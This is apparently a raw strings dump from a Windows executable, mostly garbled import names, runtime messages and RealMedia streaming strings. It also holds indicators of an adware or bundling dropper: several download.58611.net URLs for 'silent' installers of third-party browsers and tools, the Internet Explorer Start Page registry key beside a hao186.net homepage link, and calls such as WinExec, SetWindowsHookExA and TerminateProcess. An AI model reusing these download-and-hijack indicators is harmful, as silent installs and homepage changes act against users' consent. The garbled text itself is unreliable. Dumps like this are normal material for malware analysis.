FileTimeToSystemTime
FillRect
FillRgn
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
F\jLSP
- floating point not loaded
FlushFileBuffers
FormatMessageA
FpHt&Ht
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
Friday
[/fS_MR
Ft_^][
<fu&8M
Fxt_;FTu@
GAIsProcessorFeaturePresent
g~b1Y%
Gdi32.dll
GDI32.dll
GetACP
GetActiveWindow
GetBkColor
GetBkMode
GetCapture
GetClassInfoA
GetClassLongA
GetClassNameA
GetClientRect
GetClipboardData
GetClipBox
GetClipRgn
GetCommandLineA
GetConnectString
GetCPInfo
GetCurrentObject
GetCurrentProcess
GetCurrentThread
GetCurrentThreadId
GetCursorPos
GetDesktopWindow
GetDeviceCaps
GetDIBits
GetDlgCtrlID
GetDlgItem
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileAttributesA
GetFileSize
GetFileTime
GetFileTitleA
GetFileType
GetFocus
GetForegroundWindow
GetFullPathNameA
GetKeyState
GetLastActivePopup
GetLastError
GetLocalTime
GetMenu
GetMenuCheckMarkDimensions
GetMenuItemCount
GetMenuItemID
GetMenuState
GetMessageA
GetMessagePos
GetMessageTime
GetModuleFileNameA
GetModuleHandleA
GetMonitorInfoA
GetNextDlgTabItem
GetObjectA
GetOEMCP
GetOpenFileNameA
GetParent
GetPolyFillMode
GetProcAddress
GetProcessHeap
GetProcessVersion
GetProfileStringA
GetPropA
GetROP2
GetSaveFileNameA
GetScrollPos
GetScrollRange
GET %s HTTP/1.1
GetStartupInfoA
GetStdHandle
GetStockObject
GetStretchBltMode
GetStringTypeA
GetStringTypeW
GetSubMenu
GetSysColor
GetSysColorBrush
GetSystemDirectoryA
GetSystemMenu
GetSystemMetrics
GetSystemPaletteEntries
GetSystemTime
GetTabList
GetTempPathA
GetTextColor
GetTextExtentPoint32A
GetTextMetricsA
GetTickCount
GetTimeZoneInformation
GetTopWindow
GetVersion
GetVersionExA
GetViewportExtEx
GetViewportOrgEx
GetVolumeInformationA
GetWindow
GetWindowDC
GetWindowExtEx
GetWindowLongA
GetWindowOrgEx
GetWindowPlacement
GetWindowRect
GetWindowsDirectoryA
GetWindowTextA
GetWindowTextLengthA
GHE`xxx
 (*.GIF)|*.GIF|
GlobalAddAtomA
GlobalAlloc
GlobalDeleteAtom
GlobalFindAtomA
GlobalFlags
GlobalFree
GlobalGetAtomNameA
GlobalHandle
__GLOBAL_HEAP_SELECTED
GlobalLock
GlobalReAlloc
GlobalSize
GlobalUnlock
GrayStringA
GroupBox
GUID: 00000000-0000-0000-0000-000000000000
GUUUVj
`h````
h9n`u;
hash input: %x %x %x %x
hash output: %x %x %x %x
hash parameter:
header
header extension
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
hfg }}}
hgjlkbrfzaoe
HHtpHHtl
HIFJhig
H:mm:ss
Host: %s
HrCg@b	g
HSVHWtgHHtF
Ht#HHt
HtHHuz
http://
HTTP/1.0
HTTP/1.1
http://download.58611.net:8181/baiduan/baiduan_silent_ruochen.exeA
http://download.58611.net:8181/baidusd/baidusd_silent_ruochen.exeA
http://download.58611.net:8181/pps/pps_silent_ruochen.exe>
http://download.58611.net:8181/pptv_silent/PPTV_forqd3036_06888.exe
http://download.58611.net:8181/QQBrowser/QQBrowser_silent_ruochen.exeI
http://download.58611.net:8181/qqPCTray_silent/qqpcmgr_silent_ruochen.exe9
http://download.58611.net:8181/sogouie/sogouie_silent_ruochen.exeC
http://download.58611.net:8181/uc/UCBrowser_silent_ruochen.exeA
http://www.hao186.net/?tn=6888
hWj@_;
_hypot
 (*.ICO)|*.ICO|
IDQWWPR
#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)
#ifdef _WIN32
If-Match: %s
Illegal character '%c' in input.
ImageList_Destroy
#include "l.chs\afxres.rc"          // Standard components
InflateRect
InitCommonControlsEx
InitializeCriticalSection
InterlockedDecrement
InterlockedIncrement
IntersectRect
InvalidateRect
IQhHnH
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
IsChild
IsDialogMessageA
IsIconic
IsRectEmpty
IsWindow
IsWindowEnabled
IsWindowVisible
IsZoomed
It#Iu%
\$\}-j
JACd}}}
JanFebMarAprMayJunJulAugSepOctNovDec
January
jBWVSSQ
JPEGMEM
 (*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
 (*.JPG)|*.JPG|BMP
j VUPWQ
jzyqfhdslinbc
kernel32
KERNEL32
kernel32.dll
Kernel32.dll
KERNEL32.dll
KGI8}}}
KillTimer
kXEQ>\u
^l_^][
;l$ }:
L$ ]_^
L$$_^]
L$0hlnI
L$0Ph4
L$0PQh
L$0PQR
L$0PQS
L$0RPVQ
L$0SUV@W
L23fff&ff
L$,_^]3
L$,_[3
L$4_^3
L$4_^[d
L$4S+L$0Qj
L$4UQWP
L$4VQUP
L$4WPQR
L$4WQUVS
L$8^]_3
L$8_^][d
L$8RPVQ
L$8WPQR
LANGUAGE 4, 2
Language: en-US
Last-Modified: 
LCMapStringA
LCMapStringW
L$`_^][d
L$|_^][d
L$ ^][d
L$ _^d
L$ _^][d
L$,_^][d
L$(_^][d
L$@^[d
L$@_^][d
L$$^[d
L$$^]d
L$$_^d
L$$_^][d
L$\_^][d
L$D_^[d
L$D_^][d
L$D_]d
L$DPQj
L$DQRPUV
L$DQUR
L$DSVQ
LeaveCriticalSection
l	g~b0R 
l	g~b0Rdk
L$h_^]3
L$h_^][d
L$H_^][d
L$H][d
L$Hj&Q
l$HQRVU
L$HSUVWP
LineTo
ListBox
LISTBOX
L$L_^]3
L$l_^][d
L$L^[d
L$L_^][d
L$LPQR
L$lRVQ
LoadBitmapA
LoadCursorA
LoadIconA
LoadImageA
LoadLibraryA
LoadResource
LoadStringA
LocalAlloc
LocalFree
LocalReAlloc
Location
Location: 
LockFile
LockResource
L$P_^d
L$P_]^[d
L$|PQh
L$ PQh
L$(PQR
L$@PQR
L$<PQVV
L$pRPQ
LPtoDP
L$(PVQ
L$$QQP
L$ QSR
L$,RPQ
L$(RPQ
L$<RPQW
L$@RQj
L$@RUQ
L$<SQR
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
L$,SUV
L$(SUV
L$T_^]
L$t_^d
L$t][d
L$T_^]d
L$T_^][d
|$LtE;
L$TSWQ
L$(UUh
\$lUV3
\$LUVW
L$(VQRSP
L$(VQVj
l$@VW3
l$<VWj
L$ WPQ
L$(WQR
L$(WSR
L$X_^]3
L$x_^d
L$x_^][d
L$X_^d
L$X;L$
L$XSQh
@;l$\~Z
mailto:
MapViewOfFile
MapWindowPoints
marker
MbP?RTSP/1.0
M/d/yy
MessageBoxA
MGridCells
Microsoft Visual C++ Runtime Library
midiOutPrepareHeader
midiOutReset
midiOutUnprepareHeader
midiStreamClose
midiStreamOpen
midiStreamOut
midiStreamProperty
midiStreamRestart
midiStreamStop
 (*.MID)|*.MID|
MKI`~~~
mlti_data_size: %i
MLTI tag not detected, copying data
ModifyMenuA
Monday
MonitorFromPoint
MonitorFromRect
MonitorFromWindow
MoveToEx
MoveWindow
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Mpr.dll
msctls_progress32
MS Sans Serif
MS Shell Dlg
__MSVCRT_HEAP_SELECT
MulDiv
MultiByteToWideChar
mutex bitrate
mutex unknown
n0SSSSU
-NbkSbpS
-NbkSbpS(
NCFXC54
nd9~dt
NDG^D55
N/f@b	g
NH_^][
Nh;NX|
NJJ>7,+
-N"N1Y
N*Ncktepe
N*Ntepe
N*N(W%
N*N(W0
no error correction
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
not verified: ! (i < 56)
not verified: (len << 3) > a true
not verified:  while ( d < len )
November
NSPlayer/9.0.0.2980; {%s}; Host: %s
nt2Ht#Ht
NTRPQj
(null)
N$~	WU
NX9NXu 
Nyt2S	W	w	w
nzzpenc
O(_^][
o0SSSSU
October
OffsetRect
OffsetViewportOrgEx
OldPNMPlayer
ole32.dll
OLEAUT32.dll
OleInitialize
OleUninitialize
OpenClipboard
OpenDatabase
OpenEventA
OpenFileMappingA
OpenPrinterA
OPTIONS
out.prn
OX[0R 
~P9~Pun
padding
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
PA#define _AFX_NO_SPLITTER_RESOURCES
PASS ******
PASS %s
PatBlt
PathToRegion
.PAVCArchiveException@@
.PAVCException@@
.PAVCFileException@@
.PAVCMemoryException@@
.PAVCNotSupportedException@@
.PAVCObject@@
.PAVCResourceException@@
.PAVCSimpleException@@
.PAVCUserException@@
PeekMessageA
Ph_^][Y
P#include "afxres.h"
PlayerStarttime: [28/03/2003:22:50:23 00:00]
PostMessageA
PostQuitMessage
PPPPhd
PPPPPPPP
P<PuWSV
ppxxxx
PQj WUS
PQQQQQ
\$ PQV
#pragma code_page(936)
Pragma: no-cache
PreviewPages
 (*.prn)|*.prn|
Process32First
Process32Next
ProcessBar
Program: 
<program name unknown>
Proxy-Connection: Keep-Alive
P$RWPh
~'PSQR
PtInRect
PtVisible
- pure virtual function call
\$PVUUS
}\PWVQ
PWVWWW
Qf9= xK
QLOH0,.
QNNF732
QPSWVR
QQSUVWj
QQSVW3
QQSVWd
QQSVWj
QQUWSS
QSUVWj
QUhD2I
QX[gbL
RaiseException
Range: bytes=%s-
Range: npt=%s-
`.rdata
ReadFile
RealChallenge1
RealChallenge2: %s, sd=%s
real: Content-length for description too big (> %uMB)!
real: got message from server:
real: got no Content-length!
real: got no ETag!
RealizePalette
Rectangle
RectVisible
RedrawWindow
Referer: %s
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegionData: 0
RegisterClassA
RegisterClipboardFormatA
RegisterWindowMessageA
RegOpenKeyExA
RegQueryValueA
RegSetValueExA
ReleaseCapture
ReleaseDC
ReleaseSemaphore
RemovePlayer
RemovePropA
Require: com.real.retain-entity-for-setup
reserved_1
reserved marker
reserved script command
resource.h
REST 0
REST 100
restart
Restart
RestoreDC
ResumeThread
rmff_fix_header: assuming data.num_packets=%i
rmff_fix_header: assuming data.size=%i
rmff_fix_header: assuming prop.num_packets=%i
rmff_fix_header: correcting prop.num_streams from %i to %i
rmff_fix_header: correcting prop.size from %i to %i
rmff_fix_header: fatal: no header given.
rmff_fix_header: no DATA chunk, creating one
rmff_fix_header: no fileheader, creating one
rmff_fix_header: setting num_headers from %i to %i
rmff_fix_header: setting prop.data_offset from %i to %i
rmff_fix_header: warning: no CONT chunk.
rmff_fix_header: warning: no MDPR chunks
rmff_fix_header: warning: no PROP chunk.
RoundRect
RPO::86
|$,RPQ
RQPj3V
RQWPUV
RRQ>|||
RSbpS\O
RtlMoveMemory
RtlUnwind
rtsp://
RTSP/1.0 200 OK
RTSP/1.0 451 Parameter Not Understood
rtsp://%s:%i
rtsp://%s:%i/%s
runtime error 
Runtime Error!
[RU&uop
RVPUSQ
Saturday
SaveDC
SbpS0R
SbpS@b	gu
SbpS:g:
SbpS\O
ScaleViewportExtEx
ScaleWindowExtEx
ScreenToClient
script command
ScrollWindowEx
 [%s:%d]
 [%s:%d] 
[%s:%d]
sdpplin: no m= found.
SELECT
SelectClipRgn
SelectObject
SelectPalette
SendDlgItemMessageA
SendMessageA
 sendto 
September
Server
Server:
Server: 
Session:
Session: %s
SetActiveWindow
SetBkColor
SetBkMode
SetCapture
SetClipboardData
Set-cookie: 
Set-Cookie: 
SetCurrentDirectoryA
SetCursor
SetCursorPos
SetEndOfFile
SetEnvironmentVariableA
SetErrorMode
SetEvent
SetFilePointer
SetFocus
SetForegroundWindow
SetHandleCount
SetLastError
SetMapMode
SetMenu
SetMenuItemBitmaps
SET_PARAMETER
SetParent
SetPolyFillMode
SetPropA
SetRect
SetRectEmpty
SetROP2
SetScrollPos
SetScrollRange
SetStdHandle
SetStretchBltMode
SetTextColor
SetTimer
Settings
SetUnhandledExceptionFilter
SetViewportExtEx
SetViewportOrgEx
SetWindowExtEx
SetWindowLongA
SetWindowOrgEx
SetWindowPos
SetWindowRgn
SetWindowsHookExA
SetWindowTextA
Shell32.dll
SHELL32.dll
ShellExecuteA
Shell_NotifyIconA
\shell\open\command
SHGetSpecialFolderPathA
Shift+F1
Shift+F10
Shift+F11
Shift+F12
Shift+F2
Shift+F3
Shift+F4
Shift+F5
Shift+F6
Shift+F7
Shift+F8
Shift+F9
ShowWindow
simple index
SING error
SIZE %s
sO;>|C;~
SOCKET
software
Software\
Software\Microsoft\Internet Explorer\Main\Start Page
%*s %s
%s %s %s
SS@SSPVSS
_SSSSU
%s/streamid=0
%s/streamid=1
StartDocA
StartPage
stream bitrate properties
Stream description size: %i
stream header
Streams: %i
stream=%u;rule=%u,
StretchBlt
%*s %u
Subscribe: 
Sunday
SunMonTueWedThuFriSat
Super-EC
SupportsMaximumASMBandwidth: 1
SUVWh4
SUVWh8
SUVWjH
SUVWjp
SWVVVRPV
System
SystemParametersInfoA
^t_^][
T$$_^]
T$0hMMS R
T$0PQR
T$0QhH
T$0RPQ
T$0SUV
@t4Ht1Ht_Ht
T$4PQR
T$8QRP
T$8QRV
T$8RPQ
T$8RWj
T$8VRS
t$ 90t
t	9p$u
t&9^$t
TabbedTextOutA
taskmgr.exe
TaskParam
tC9{dt
T$$+D$4
tD9_Pt?
T$dPQR
T$DPQRW
T$DQRU
T$DQSR
T$DSRWQh
T$Du	f
T$DWRh
T$\;D$Xu
t(ENEN;
TerminateProcess
TerminateThread
TextOutA
T/f&Tcknx
<]t_G<-uA
t$ h02I
T$|h8mI
!This program cannot be run in DOS mode.
T$HQRP
t,ht{H
t>Ht Ht
t+Ht$Ht
+t|HtlHt\HtCHt%
Thursday
T$H} VP
tI;Ftr
Title: %s
t:It-P
T$\jdSR
+tJHt:Ht*
TLOSS error
T$lPRh
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
t$LUPh
T$LWUQVR
tooltips_class32
T$pPQR
t$PPVS
T$(PQR
T$\PQR
T$PQRP
T$@PQRUV
T$ PQWWR
T$$PRV
T$ PSQRU
tq9~Dt
TQQ.;32
T$ QRP
T$,QRP
T$(QRSU
T$(QRU
T$(QVURWP
TranslateAcceleratorA
TranslateMessage
Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play
tRHt}H
T$$RPWUV
T$,RQP
t%RSQP
t$$RVP
T$<RVW
tS9~@uN
T$ SRh
T$,SRh
t$(SSh
t#SSUP
T$ SWRP
+ttHHtd
t.;t$$t(
Tuesday
T$\URP
tvOt:Ot
t$$VSS
tvWWWWU
^TW@2$&
T$,WQR
T$,WRS
T$\WVR
t/WWUPj
 (*.txt)|*.txt|
T$XUSR
;t$Xu";\$\u
t$XWVS
TYPE A
TYPE I
?u='@^
u._^][
u29l$xu,
u"8D$yu
u]9B uX
u	9~@u
uA;5$.J
uAUUUUj
uf9=@wK
>:u#FV
uh9^8uX
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
>:uNFV
UnhandledExceptionFilter
UnhookWindowsHookEx
unknown
UnlockFile
UnmapViewOfFile
UnregisterClassA
UpdateWindow
uR9BxuM
uRFGHt
USER32
user32.dll
User32.dll
USER32.dll
User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)
User-Agent: %s
USER %s
u$SShe
ust0)#&
u(Uh(oI
\$(UVW
UWSPh`
ValidateRect
VC20XC00U
V#D$,WPQ
Vh;VX|
video media
VirtualAlloc
VirtualFree
\$<VW3
V,_^[Y
W9^du-
WaitForInputIdle
WaitForMultipleObjects
WaitForSingleObject
waveOutClose
waveOutGetNumDevs
waveOutOpen
waveOutPause
waveOutPrepareHeader
waveOutReset
waveOutUnprepareHeader
waveOutWrite
 (*.WAV;*.MID)|*.WAV;*.MID|WAV
 (*.WAV)|*.WAV|MIDI
Wednesday
	WG!2S(
WideCharToMultiByte
window
WindowFromPoint
windows
WinExec
WinHelpA
WINMM.dll
WINSPOOL.DRV
WjdjdPQh
Wj(_Wj
|$$}$WP
(wqt\HHtS
WriteFile
WritePrivateProfileStringA
WS2_32.dll
 WSACancelBlockingCall 
 WSAStartup
 WSAStartup 
wsprintfA
WTV ~|~
WTWindow
|$@ Wu
\$(WUS
WUT2~~~
"WWShH
wwwwww
XY[Z[]
YHYtLHt9
YX[(W	
_^][YY
 yyyy = mmm 
|z;^<}uWS
<zv[<Ar
<ZvS<0r
[ZY4331422/4EEC4ppo&